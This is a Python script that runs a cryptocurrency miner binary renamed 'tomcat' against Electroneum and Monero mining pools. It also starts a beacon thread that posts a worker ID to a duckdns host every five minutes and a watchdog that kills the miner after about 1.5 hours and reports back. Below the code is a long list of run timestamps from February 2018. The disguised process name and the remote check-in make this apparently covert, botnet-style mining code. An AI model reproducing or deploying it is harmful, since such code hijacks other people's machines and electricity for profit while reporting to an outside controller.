import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:44:01.245819
#2018-02-17 16:32:01.709281
#2018-02-17 18:19:05.604230
#2018-02-17 20:07:03.781725
#2018-02-17 21:54:01.751236
#2018-02-17 23:39:03.926177
#2018-02-18 01:28:05.704887
#2018-02-18 03:15:08.763988
#2018-02-18 05:05:08.159685
#2018-02-18 06:56:07.252673
#2018-02-18 08:46:02.045429
#2018-02-18 10:33:01.927826
#2018-02-18 12:18:04.555322
#2018-02-18 14:05:04.470330
#2018-02-18 15:56:03.632779
#2018-02-18 17:46:06.041625
#2018-02-18 19:34:01.872795
#2018-02-18 21:19:06.976116
#2018-02-18 23:07:03.877244
#2018-02-19 00:54:01.572104
#2018-02-19 02:41:06.279478
#2018-02-19 04:28:06.650569
#2018-02-19 06:13:04.022620
#2018-02-19 07:59:03.477866
#2018-02-19 09:50:06.005878
#2018-02-19 11:39:06.007380
#2018-02-19 13:26:04.728722
#2018-02-19 15:14:04.572163
#2018-02-19 17:03:04.698369
#2018-02-19 18:50:11.396002
#2018-02-19 20:46:01.232363
#2018-02-19 22:34:01.319727
#2018-02-20 00:19:03.913481
#2018-02-20 02:07:06.739343
#2018-02-20 03:57:07.444682
#2018-02-20 05:43:06.428289
#2018-02-20 07:30:01.519610
#2018-02-20 09:14:01.312659
#2018-02-20 10:57:04.436693
#2018-02-20 12:44:02.079110
#2018-02-20 14:29:05.505562
#2018-02-20 16:13:12.874934
#2018-02-20 17:58:10.347858
#2018-02-20 19:51:03.869775
#2018-02-20 21:40:09.441624
#2018-02-20 23:21:06.656422
#2018-02-21 01:05:02.816900
#2018-02-21 02:52:01.998555
#2018-02-21 04:39:06.272215
#2018-02-21 06:28:04.482637
#2018-02-21 08:14:08.100051
#2018-02-21 10:01:07.325280
#2018-02-21 11:49:01.383859
#2018-02-21 13:40:08.311670
#2018-02-21 15:25:10.155604
#2018-02-21 17:16:09.646490
#2018-02-21 19:05:07.831312
#2018-02-21 20:53:08.113220
#2018-02-21 22:39:08.810058
#2018-02-22 00:28:01.515788
#2018-02-22 02:18:06.507145
#2018-02-22 04:04:06.148662
#2018-02-22 05:50:01.379473
#2018-02-22 07:35:08.895730
#2018-02-22 09:23:08.087965
#2018-02-22 11:09:05.846531
#2018-02-22 12:55:08.991566
#2018-02-22 14:44:05.339578
#2018-02-22 16:29:01.547113
#2018-02-22 18:15:13.660521
#2018-02-22 20:07:01.655645
#2018-02-22 21:55:04.486422
#2018-02-22 23:42:04.768295
#2018-02-23 01:31:08.107681
#2018-02-23 03:19:05.608072
#2018-02-23 05:05:07.129385
#2018-02-23 06:49:07.168826
#2018-02-23 08:42:01.523625
#2018-02-23 10:58:08.580883
#2018-02-23 12:53:05.614383
#2018-02-23 14:37:07.644610
#2018-02-23 16:28:07.728989
#2018-02-23 18:15:06.908699
#2018-02-23 20:00:12.064983
#2018-02-23 21:45:06.778587
#2018-02-23 23:36:05.306729
#2018-02-24 01:25:04.068794
#2018-02-24 03:15:06.596479
#2018-02-24 05:01:05.144221
#2018-02-24 06:49:04.881996
#2018-02-24 08:38:05.088073
#2018-02-24 10:22:05.986970
#2018-02-24 12:17:06.382655
#2018-02-24 14:09:06.331916
#2018-02-24 15:56:07.722062
#2018-02-24 17:48:05.543844
#2018-02-24 19:36:06.693329
#2018-02-24 21:23:02.141820
#2018-02-25 00:03:07.767670
#2018-02-25 04:06:07.263857
#2018-02-25 07:37:04.828230